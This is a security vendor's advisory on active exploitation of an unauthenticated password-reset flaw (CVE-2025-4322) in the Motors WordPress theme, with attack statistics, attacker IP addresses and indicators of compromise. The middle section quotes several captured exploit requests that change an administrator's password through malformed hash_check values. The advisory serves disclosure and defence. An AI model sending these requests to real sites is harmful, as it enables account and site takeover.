Attackers Actively Exploiting Critical Vulnerability in Motors Theme

by

📢 Calling all Vulnerability Researchers and Bug Bounty Hunters! 📢 

🌞 Spring into Summer with Wordfence! Now through August 4, 2025, earn 2X bounty rewards for all in-scope submissions from our ‘High Threat’ list in software with fewer than 5 million active installs. Bounties up to $31,200 per vulnerability. Submit bold. Earn big!

On May 2nd, 2025, we received a submission for a Privilege Escalation vulnerability in Motors, a WordPress theme with more than 22,000 sales. This vulnerability makes it possible for an unauthenticated attacker to change the password of any user, including an administrator, which allows them to take over the account and the website. We originally disclosed this vulnerability on May 19th, 2025 and our records indicate that attackers started exploiting the issue the next day on May 20th, 2025. It appears mass exploitation started on June 7th, 2025. The Wordfence Firewall has already blocked over 23,100 exploit attempts targeting this vulnerability.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 6, 2025. Sites using the free version of Wordfence received the same protection after the standard 30-day delay on June 5, 2025.

We urge users to ensure their sites are updated with the latest patched version of Motors, version 5.6.68 at the time of this writing, as soon as possible, as this vulnerability is under active exploitation.

Vulnerability Summary from Wordfence Intelligence

Motors <= 5.6.67 – Unauthenticated Privilege Escalation via Password Update/Account Takeover

9.8
CVSS Rating
9.8 (Critical)
CVE-ID
CVE-2025-4322
Affected Versions
<= 5.6.67
Patched Version
5.6.68
Bounty
$1,073.00
Affected Software
Motors
Affected Software Slug
motors
Researcher
Foxyyy

The Motors theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.6.67. This is due to the theme not properly validating a user’s identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user passwords, including those of administrators, and leverage that to gain access to their account.

More Details >

Vulnerability Details

To exploit the vulnerability, the attacker needs to know the page where the website owner added the “Login Register” widget, which also includes the password recovery. Additionally, the hash_check parameter must be a sequence of invalid utf8 character(s), which get stripped and cause the hash comparison to succeed, allowing the password to be changed.

In our blog post linked below, we detailed the vulnerability:
22,000 WordPress Sites Affected by Privilege Escalation Vulnerability in Motors WordPress Theme

A Closer Look at the Attack Data

The following data highlights actual exploit attempts from threat actors targeting this vulnerability. It appears that threat actors are trying to exploit various common pages, such as /reset-password, /account, or /signin, and they use different invalid utf8 values in the hash_check parameter, like %80, %C0, or %25C0.

Example attack requests

POST /index.php/login-register/?user_id=3&hash_check=%80 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded

stm_new_password=Testtest123%21%40%23
POST /?page_id=1718&user_id=1&hash_check=%80 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded

stm_new_password=rzkkd%24SP3znjrn
POST /auth?user_id=1&hash_check=%C0 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36")
Content-Type: application/x-www-form-urlencoded

stm_new_password=Kurd%40Kurd12123
POST /reset-password?user_id=1&hash_check=%C0 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36")
Content-Type: application/x-www-form-urlencoded

stm_new_password=Kurd%40Kurd12123
POST /account/?user_id=1&hash_check=%25C0 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/109.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded

stm_new_password=owm9cpXHAZTk
POST /signin/?user_id=1&hash_check=%25C0 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded

stm_new_password=owm9cpXHAZTk
POST /account/?user_id=1&hash_check=%25C0 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded

stm_new_password=db250WJUNEiG

Wordfence Firewall

The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.

Total Number of Exploits Blocked

The Wordfence Firewall has blocked over 23,100 exploit attempts since the vulnerability was publicly disclosed.

According to our data, attackers started targeting websites the day after the vulnerability was disclosed, on May 20th. We also detected and blocked a large number of exploit attempts on June 7th, June 9th and June 17th. Our data is limited due to the nature of the WAF rule which will only block malicious requests on sites where the vulnerable version of the theme is installed. This is important to note considering it means that most of the requests we blocked would likely have led to site compromises if they did not have Wordfence installed.

Top Offending IP Addresses

The following IP Addresses are currently the most actively engaged IP addresses targeting the Motors theme password reset function:

  • 198.2.233.90
    • Over 4700 blocked requests.
  • 192.210.243.217
    • Over 3600 blocked requests.
  • 123.253.111.178
    • Over 3200 blocked requests.
  • 217.142.21.233
    • Over 1600 blocked requests.
  • 8.217.154.123
    • Over 1400 blocked requests.
  • 47.243.115.199
    • Over 1400 blocked requests.
  • 159.89.192.91
    • Over 1300 blocked requests.
  • 169.150.243.135
    • Over 600 blocked requests.

Indicators of Compromise

One obvious sign of infection is if a site’s administrator is unable to log in with the correct password as it may have been changed as a result of this vulnerability, and the site is running Motors theme version 5.6.67 or older. We also recommend checking for newly added malicious administrators, as these may have been added to maintain persistence.

It’s important to note that the vulnerable page’s permalink can be anything depending on the website, and attackers can use a hash_check parameter with any value and length. But if the hash_check parameter value starts with a “%” character and is only a few characters long, it is almost certainly an exploit attempt. The stm_lost_password_hash user meta value is by default a 20-character long string containing only uppercase and lowercase letters and numbers.

Look for requests in a site’s access log with the following request parameters:

  • ?user_id=1&hash_check=%80
  • ?user_id=1&hash_check=%C0

Or anything similar where the hash_check parameter starts with a “%” character.

We also recommend reviewing log files for any requests originating from the following IP addresses:

  • 192.210.243.217
  • 123.253.111.178
  • 217.142.21.233
  • 8.217.154.123
  • 47.243.115.199
  • 159.89.192.91
  • 169.150.243.135
  • 2404:a3c0:7::98c6:24ff:fe00:3e0
  • 195.82.147.118
  • 217.142.21.2

Conclusion

In today’s article, we covered the attack data for a critical-severity vulnerability in the Motors theme that allows unauthenticated attackers to easily take over websites by resetting the password of any user, including administrators. Our threat intelligence indicates that attackers may have started actively targeting this vulnerability as early as May 20th, 2025 with mass exploitation starting on June 7th, 2025. The Wordfence firewall has already blocked over 23,100 exploit attempts targeting this vulnerability.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 6, 2025. Sites using the free version of Wordfence received the same protection after the standard 30-day delay on June 5, 2025.

Even if you have already received a firewall rule for this issue we urge you to ensure that your site is updated to at least version 5.6.68 in order to maintain normal functionality. If you have friends or colleagues running Motors, be sure to forward this advisory to them, as thousands of sites could still be unprotected and unpatched.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

The post Attackers Actively Exploiting Critical Vulnerability in Motors Theme appeared first on Wordfence.

Leave a Comment